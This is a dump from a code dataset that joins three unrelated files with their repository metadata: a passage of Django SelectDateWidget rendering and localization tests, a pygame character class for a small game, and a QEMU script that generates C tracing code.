<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering a datetime value.
self.assertHTMLEqual(w.render('mydate', datetime.date(2010, 4, 15)), w.render('mydate', '2010-04-15'))
# Invalid dates should still render the failed date.
self.assertHTMLEqual(
w.render('mydate', '2010-02-31'),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2" selected="selected">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31" selected="selected">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering with a custom months dict.
w = SelectDateWidget(months=MONTHS_AP, years=('2013',))
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">Jan.</option>
<option value="2">Feb.</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">Aug.</option>
<option value="9">Sept.</option>
<option value="10">Oct.</option>
<option value="11">Nov.</option>
<option value="12">Dec.</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2013">2013</option>
</select>
""",
)
a = GetDate({'mydate_month': '4', 'mydate_day': '1', 'mydate_year': '2008'})
self.assertTrue(a.is_valid())
self.assertEqual(a.cleaned_data['mydate'], datetime.date(2008, 4, 1))
# As with any widget that implements get_value_from_datadict,
# we must be prepared to accept the input from the "as_hidden"
# rendering as well.
self.assertHTMLEqual(
a['mydate'].as_hidden(),
'<input type="hidden" name="mydate" value="2008-4-1" id="id_mydate" />',
)
b = GetDate({'mydate': '2008-4-1'})
self.assertTrue(b.is_valid())
self.assertEqual(b.cleaned_data['mydate'], datetime.date(2008, 4, 1))
# Invalid dates shouldn't be allowed
c = GetDate({'mydate_month': '2', 'mydate_day': '31', 'mydate_year': '2010'})
self.assertFalse(c.is_valid())
self.assertEqual(c.errors, {'mydate': ['Enter a valid date.']})
# label tag is correctly associated with month dropdown
d = GetDate({'mydate_month': '1', 'mydate_day': '1', 'mydate_year': '2010'})
self.assertIn('<label for="id_mydate_month">', d.as_p())
def test_selectdate_required(self):
class GetNotRequiredDate(Form):
mydate = DateField(widget=SelectDateWidget, required=False)
class GetRequiredDate(Form):
mydate = DateField(widget=SelectDateWidget, required=True)
self.assertFalse(GetNotRequiredDate().fields['mydate'].widget.is_required)
self.assertTrue(GetRequiredDate().fields['mydate'].widget.is_required)
def test_selectdate_empty_label(self):
w = SelectDateWidget(years=('2014',), empty_label='empty_label')
# Rendering the default state with empty_label setted as string.
self.assertInHTML('<option value="0">empty_label</option>', w.render('mydate', ''), count=3)
w = SelectDateWidget(years=('2014',), empty_label=('empty_year', 'empty_month', 'empty_day'))
# Rendering the default state with empty_label tuple.
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">empty_month</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">empty_day</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">empty_year</option>
<option value="2014">2014</option>
</select>
""",
)
self.assertRaisesMessage(ValueError, 'empty_label list/tuple must have 3 elements.',
SelectDateWidget, years=('2014',), empty_label=('not enough', 'values'))
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n(self):
w = SelectDateWidget(years=('2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016'))
self.assertEqual(
w.value_from_datadict({'date_year': '2010', 'date_month': '8', 'date_day': '13'}, {}, 'date'),
'13-08-2010',
)
self.assertHTMLEqual(
w.render('date', '13-08-2010'),
"""
<select name="date_day" id="id_date_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13" selected="selected">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="date_month" id="id_date_month">
<option value="0">---</option>
<option value="1">januari</option>
<option value="2">februari</option>
<option value="3">maart</option>
<option value="4">april</option>
<option value="5">mei</option>
<option value="6">juni</option>
<option value="7">juli</option>
<option value="8" selected="selected">augustus</option>
<option value="9">september</option>
<option value="10">oktober</option>
<option value="11">november</option>
<option value="12">december</option>
</select>
<select name="date_year" id="id_date_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Even with an invalid date, the widget should reflect the entered value (#17401).
self.assertEqual(w.render('mydate', '2010-02-30').count('selected="selected"'), 3)
# Years before 1900 work
w = SelectDateWidget(years=('1899',))
self.assertEqual(
w.value_from_datadict({'date_year': '1899', 'date_month': '8', 'date_day': '13'}, {}, 'date'),
'13-08-1899',
)
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n_date_changed(self):
    """
    DateField.has_changed() must keep working with SelectDateWidget
    while a localized (Dutch) date format is active.
    Refs #17165.
    """
    def widget_data(day, hidden=None):
        # Build the POST-style payload SelectDateWidget submits; when
        # *hidden* is given, add the hidden-initial field as well.
        payload = {
            'mydate_year': '2008',
            'mydate_month': '4',
            'mydate_day': day,
        }
        if hidden is not None:
            payload['initial-mydate'] = HiddenInput()._format_value(hidden)
        return payload

    # With Field.show_hidden_initial=False -----------------------
    form = GetDate(widget_data('1'),
                   initial={'mydate': datetime.date(2008, 4, 1)})
    self.assertFalse(form.has_changed())
    form = GetDate(widget_data('2'),
                   initial={'mydate': datetime.date(2008, 4, 1)})
    self.assertTrue(form.has_changed())

    # With Field.show_hidden_initial=True ------------------------
    class GetDateShowHiddenInitial(Form):
        mydate = DateField(widget=SelectDateWidget, show_hidden_initial=True)

    form = GetDateShowHiddenInitial(
        widget_data('1', hidden=datetime.date(2008, 4, 1)),
        initial={'mydate': datetime.date(2008, 4, 1)})
    self.assertFalse(form.has_changed())
    form = GetDateShowHiddenInitial(
        widget_data('22', hidden=datetime.date(2008, 4, 1)),
        initial={'mydate': datetime.date(2008, 4, 1)})
    self.assertTrue(form.has_changed())
    form = GetDateShowHiddenInitial(
        widget_data('22', hidden=datetime.date(2008, 4, 1)),
        initial={'mydate': datetime.date(2008, 4, 22)})
    self.assertTrue(form.has_changed())
    form = GetDateShowHiddenInitial(
        widget_data('22', hidden=datetime.date(2008, 4, 22)),
        initial={'mydate': datetime.date(2008, 4, 1)})
    self.assertFalse(form.has_changed())
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_l10n_invalid_date_in(self):
    """An impossible calendar date is rejected under the 'nl' locale."""
    form = GetDate({'mydate_month': '2', 'mydate_day': '31', 'mydate_year': '2010'})
    self.assertFalse(form.is_valid())
    # 'Geef een geldige datum op.' = 'Enter a valid date.'
    self.assertEqual(form.errors, {'mydate': ['Geef een geldige datum op.']})
@override_settings(USE_L10N=True)
@translation.override('nl')
def test_form_label_association(self):
    """The <label> tag must target the first dropdown the widget renders."""
    bound = GetDate({'mydate_month': '1', 'mydate_day': '1', 'mydate_year': '2010'})
    rendered = bound.as_p()
    self.assertIn('<label for="id_mydate_day">', rendered)
| bsd-3-clause |
geekandtechgirls/The-Last-Caturai | Character.py | 1 | 2753 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""character.py"""
"""
This file is part of The Last Caturai.
The Last Caturai is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
The Last Caturai is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Foobar. If not, see <http://www.gnu.org/licenses/>.
"""
"""Defines an abstract character"""
from Physics import Physics
# import constants # => neccesary for jump method
# import pygame
class Character(Physics):
    """Abstract base for every game character (player and enemies).

    Combines the physics behaviour inherited from ``Physics`` with hit
    points and a sprite sheet sliced into per-direction animation frames.
    """

    def __init__(self, hp, position, sprite):
        """
        hp       -- initial hit points.
        position -- starting position, forwarded to Physics.
        sprite   -- path to the character's sprite-sheet image.
        """
        super(Character, self).__init__(img_path=sprite, position=position)
        self.hp = hp
        self.rect = self.image.get_rect()
        # Two animation frames per direction.
        self.movimientos = self._cortar_chara(fil=2)

    def _cortar_chara(self, fil):
        """Slice the sprite sheet into animation frames.

        Returns a dict (not a tuple, as an older comment claimed) mapping
        a direction code to a list of ``fil`` source rectangles
        (x, y, width, height) inside the sprite sheet:
        'A' = down (abajo), 'U' = up (arriba), 'D' = right (dcha),
        'I' = left (izq).
        """
        abajo = [0] * fil
        arriba = [0] * fil
        dcha = [0] * fil
        izq = [0] * fil
        for i in range(fil):
            # Frames sit in 35px-wide columns, each frame being 32x32.
            # NOTE(review): the row offsets are 0/35/75/105 rather than a
            # uniform 35px step (75 vs. 70) -- presumably this matches the
            # actual sheet layout; confirm against the sprite image.
            abajo[i] = (i * 35, 0, 32, 32)
            izq[i] = (i * 35, 35, 32, 32)
            dcha[i] = (i * 35, 75, 32, 32)
            arriba[i] = (i * 35, 105, 32, 32)
        return {'A': abajo, 'U': arriba, 'D': dcha, 'I': izq}

    def draw(self, screen):
        """Blit the current animation frame at the character's position."""
        screen.blit(self.image, self.position,
                    self.movimientos[self.direction][self.index])

    def attack(self):
        # Bug fix: ``raise NotImplemented(...)`` raised a TypeError because
        # NotImplemented is a singleton, not a callable exception class.
        raise NotImplementedError("Implement attack in MainCharacter and Enemy")

    def movement(self):
        raise NotImplementedError("Implement movement in MainCharacter and Enemy")

    def jump(self):
        """Start a jump by giving the character an upward velocity."""
        self.change_y_speed_vector(-20)
        self.on_ground = False
        # TODO: only allow jumping while standing on a platform or the
        # ground; the removed commented-out code sketched a collision
        # check against self.level.platform_list and SCREEN_HEIGHT.
tayrn/qemu | scripts/tracetool/backend/simple.py | 55 | 1385 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simple built-in backend.
"""
__author__ = "Lluís Vilanova <vilanova@ac.upc.edu>"
__copyright__ = "Copyright 2012, Lluís Vilanova <vilanova@ac.upc.edu>"
__license__ = "GPL version 2 or (at your option) any later version"
__maintainer__ = "Stefan Hajnoczi"
__email__ = "stefanha@linux.vnet.ibm.com"
from tracetool import out
def c(events):
    """Emit the C source: a trace_list[] table with one entry per event."""
    out('#include "trace.h"',
        '',
        'TraceEvent trace_list[] = {')
    for event in events:
        out('{.tp_name = "%(name)s", .state=0},', name=event.name)
    out('};')
def h(events):
    """Emit the header: one static inline trace_<name>() wrapper per event.

    Each wrapper forwards the event number plus its arguments to the
    numbered traceN() backend call; the event count and the extern
    declaration of trace_list[] are appended at the end.
    """
    out('#include "trace/simple.h"',
        '')
    for num, e in enumerate(events):
        if len(e.args):
            argstr = e.args.names()
            # Every argument is cast so the variadic backend receives
            # uniform 64-bit values regardless of the declared C type.
            arg_prefix = ', (uint64_t)(uintptr_t)'
            cast_args = arg_prefix + arg_prefix.join(argstr)
            simple_args = (str(num) + cast_args)
        else:
            # No payload: the wrapper only records the event number.
            simple_args = str(num)
        out('static inline void trace_%(name)s(%(args)s)',
            '{',
            '    trace%(argc)d(%(trace_args)s);',
            '}',
            name = e.name,
            args = e.args,
            argc = len(e.args),
            trace_args = simple_args,
            )
    out('#define NR_TRACE_EVENTS %d' % len(events))
    out('extern TraceEvent trace_list[NR_TRACE_EVENTS];')
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.